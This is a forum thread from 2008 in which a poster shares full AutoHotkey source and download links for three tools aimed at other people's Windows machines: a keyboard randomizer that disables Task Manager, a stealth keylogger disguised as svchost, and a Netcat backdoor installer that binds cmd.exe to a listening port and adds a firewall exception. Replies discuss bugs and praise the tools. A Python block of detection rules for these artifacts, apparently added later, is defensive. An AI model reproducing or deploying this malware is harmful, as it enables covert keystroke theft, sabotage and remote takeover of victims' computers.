sablefoxx Posted December 9, 2008

WARNING VERY LONG POST!

For some time now, I've been coding stuff in C, in fact I wrote versions of keyl and keyr in C. Then I found AHK while trying to find a way to install my cmdo payload in a single .exe. Turns out AHK has been used on this forum before, but I forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So I re-wrote the apps, and here is the AHK source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code any way you want (works nicely with usb payloads). :)

None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself. PM/IRC/AIM me with questions.

PROGRAMS AND FEATURES

1. Keyr
-Randomizes Keys on the keyboard
-Adds itself to startup (regkey)
-Works on WinXP / Vista
-Disables Task Mgr (regkey)
-Press WinKey + X to quit
-Only about 10% of AntiVirus found it (VirusTotal)
[Download keyr v1] MD5...: de40e57473c719d84da9b1a9e2527a86

2. Keyl
-Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt
-Adds itself to startup (RegKey)
-Completely Stealthed
-Looks like svchost while running
-Works on XP / Vista
-Press WinKey + X to quit
-Only about 5% of AntiVirus found it (VirusTotal)
[Download keyl v1.1] MD5...: ebb7ab566064661707956a64be7f01b3

3.
Cmdo -Updated Cmdo Payload -Installs a Netcat backdoor (reverse shell) -Single .exe Install File -Adds itself to startup (regkey) -Completely Stealthed -In XP adds itself to the firewall exceptions list, and hides itself from the GUI -Easy to use Auto Connect Script -Downside is nc.exe has 68% detection rate (VirusTotal) [Download cmdo v1] MD5...: 260f8f4566635734a8c663358752c108 AHK SOURCE CODE So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could >Keyr keyr_install.exe ;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp keyr.exe ;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! 
$+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=- >keyl keyl_install.exe ;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install 
SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp keyl.exe ;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS 
;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! 
FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") 
if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=- >Cmdo [Download .exes] cmdo_install.exe ;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp cmdo.exe ;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp Information is Free Damn that was a long post :) Quote Link to comment Share on other sites More sharing options...
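The install scripts in the post above leave a small, fixed set of host artifacts: Run-key values, a DisableTaskMgr policy value, an XP firewall AuthorizedApplications entry, a svchost.exe outside System32, and an nc.exe started with -l and -e cmd.exe on port 69. The following is an added example, not part of the original post: detection rules for those behaviours run over simplified Sysmon-style registry (id 13) and process (id 1) events. The event field names, rule names, SYSTEM_NAMES list and sample events are assumptions constructed for illustration, and the rules generalize beyond the post's exact paths.

```python
import re
from ntpath import basename, dirname, normcase  # Windows path rules on any OS

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_NAMES = {"svchost", "lsass", "services", "csrss", "winlogon"}  # illustrative list
RUN_KEY = re.compile(r"\\currentversion\\run(?:once)?\\([^\\]+)$", re.I)
FW_LIST = re.compile(r"\\firewallpolicy\\\w+profile\\authorizedapplications\\list\\", re.I)
EXE_PATH = re.compile(r'"?([a-z]:\\[^"]*?\.exe)', re.I)

def exe_of(text):
    """First .exe path in a registry value, lower-cased; '' if none."""
    m = EXE_PATH.search(text)
    return normcase(m.group(1)) if m else ""

def is_masquerade(path):
    """Named like a core Windows binary but stored outside the system directories."""
    stem = basename(path).rsplit(".", 1)[0]
    return stem in SYSTEM_NAMES and dirname(path) not in SYSTEM_DIRS

def check_registry(target, details):
    hits = []
    run, exe = RUN_KEY.search(target), exe_of(details)
    if run:
        # svchost and friends are started by the service manager, never from a Run value.
        if run.group(1).lower() in SYSTEM_NAMES or is_masquerade(exe):
            hits.append("run-key-masquerade")
        if re.fullmatch(r"[a-z]:\\[^\\]+", exe):
            hits.append("run-key-exe-in-drive-root")
    if target.lower().endswith(r"\policies\system\disabletaskmgr") and "0x00000001" in details:
        hits.append("task-manager-disabled")
    if FW_LIST.search(target) and ":enabled" in details.lower():
        hits.append("firewall-exception-added")
    return hits

def check_process(image, cmdline):
    hits = []
    if is_masquerade(normcase(image)):
        hits.append("process-masquerade")
    listens = re.search(r"(?:^|\s)-l\b", cmdline)
    shell = re.search(r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?\b", cmdline, re.I)
    if listens and shell:  # a command shell handed to whoever connects
        port = re.search(r"(?:^|\s)-p\s+(\d+)", cmdline)
        hits.append("shell-on-listener:" + (port.group(1) if port else "?"))
    return hits

def triage(events):
    """Return {event index: [rule names]} for events that matched at least one rule."""
    out = {}
    for i, ev in enumerate(events):
        if ev["id"] == 13:
            hits = check_registry(ev["target"], ev["details"])
        elif ev["id"] == 1:
            hits = check_process(ev["image"], ev["cmdline"])
        else:
            hits = []
        if hits:
            out[i] = hits
    return out

RUN = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FW = r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy"
# Constructed sample events (field names are assumptions), not captured telemetry.
SAMPLE_EVENTS = [
    {"id": 13, "target": RUN + r"\keyr", "details": r"C:\keyr.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-0-0-0-1000\Software\Microsoft\Windows\CurrentVersion"
                         r"\Policies\System\DisableTaskMgr", "details": "DWORD (0x00000001)"},
    {"id": 13, "target": RUN + r"\svchost", "details": r"C:\svchost.exe"},
    {"id": 13, "target": RUN + r"\svchost", "details": r"C:\cmdo\cmdo.exe"},
    {"id": 13, "target": FW + r"\StandardProfile\AuthorizedApplications\List\C:\cmdo\nc.exe",
     "details": r"C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019"},
    {"id": 1, "image": r"C:\svchost.exe", "cmdline": r"C:\svchost.exe"},
    {"id": 1, "image": r"C:\cmdo\nc.exe", "cmdline": "nc.exe -l -t -p 69 -d -e cmd.exe"},
    # Benign controls: a vendor updater and the real svchost.
    {"id": 13, "target": RUN + r"\ExampleUpdater",
     "details": r'"C:\Program Files\ExampleVendor\updater.exe" /background'},
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules)
```

DisableTaskMgr and firewall-list additions can also come from legitimate administration, so those two rules are triage leads rather than verdicts; the masquerade and shell-on-listener rules are the high-confidence ones.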
X3N Posted December 10, 2008

> (sablefoxx's post above, quoted in full)

What's the CPU load for the keylogger?

jollyrancher82 Posted December 10, 2008

Did you really feel the need to quote the WHOLE source?

X3N Posted December 10, 2008

> Did you really feel the need to quote the WHOLE source?

Why not?

sablefoxx (Author) Posted December 10, 2008

Almost no CPU load, takes about 4k memory

jollyrancher82 Posted December 11, 2008

> why not?

Because everyone needs to scroll further down to read your post and further posts thereafter.

hardhittertennis Posted December 31, 2008

Just a suggestion, don't put the keylogger on a computer that someone will play an FPS on. I was testing it out and when I played a game it would try and record every "w", let's say if you are moving forward, so it takes a LONG time to move in a game lol. But besides that, great programs!

markmonster Posted June 19, 2009

I'm new to AutoIT. Coming from C. I'm getting a compilation error that reads "Unterminated string" with this line of code:

$'::GenKey("'")

Is there supposed to be an escape sequence for the single quote?

Edit: I'm such an idiot. This is Auto Hot Key. No AutoIT!!

sem1845 Posted June 20, 2009

Your link isn't working for me :(

sablefoxx (Author) Posted June 22, 2009

That's why I posted the source code. All of them (updated versions) can be found in Attack PE (see USB Hacks).